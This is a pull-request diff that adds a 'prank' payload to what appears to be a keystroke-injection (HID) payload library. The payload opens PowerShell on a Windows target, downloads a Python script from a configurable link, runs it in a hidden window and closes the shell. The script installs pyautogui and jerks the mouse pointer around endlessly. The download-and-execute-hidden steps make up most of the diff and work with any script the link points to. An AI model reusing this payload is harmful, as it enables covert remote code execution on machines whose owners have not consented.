Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
43 changes: 43 additions & 0 deletions payloads/library/prank/The_Mouse_Moves_By_Itself/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,43 @@
# The Mouse Moves By Itself

A script used to prank your friends with the mouse pointer.

**Category**: Prank

## Description

A script used to prank your friends with the mouse pointer.

Opens a shell, dowloand the Python script that will prank your friends mouving the mouse pointer.

## Getting Started

### Dependencies

* Internet Connection

### Settings

- Setup your Python script link in the payload.txt file

## Credits

<h2 align="center">Aleff</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>LinkedIn
</td>
</tr>
</table>
</div>
32 changes: 32 additions & 0 deletions payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,32 @@
############################################
# #
# Title : The Mouse Moves By Itself #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows 10/11 #
# #
############################################

ATTACKMODE HID

# Requirements:
# - Internet Connection

# VARIABLES
# - Set your Python script link
SCRIPT-PY-LINK='example.com'

QUACK DELAY 1000
QUACK GUI r
QUACK DELAY 500
QUACK STRING powershell
QUACK ENTER
QUACK DELAY 500
QUACK STRING Invoke-WebRequest -Uri \"$SCRIPT-PY-LINK\" -OutFile \"script.py\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING Start-Process python.exe -ArgumentList \"script.py\" -WindowStyle Hidden
QUACK ENTER
QUACK DELAY 1000
QUACK ALT F4
15 changes: 15 additions & 0 deletions payloads/library/prank/The_Mouse_Moves_By_Itself/script.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,15 @@
import os
try:
import pyautogui
except:
os.system("pip install pyautogui")
import pyautogui
import random
import time

while True:
# Move the mouse cursor randomly
x_offset = random.randint(-250, 250)
y_offset = random.randint(-250, 250)
pyautogui.moveRel(x_offset, y_offset, duration=0.25)
time.sleep(0.1) # 1 second delay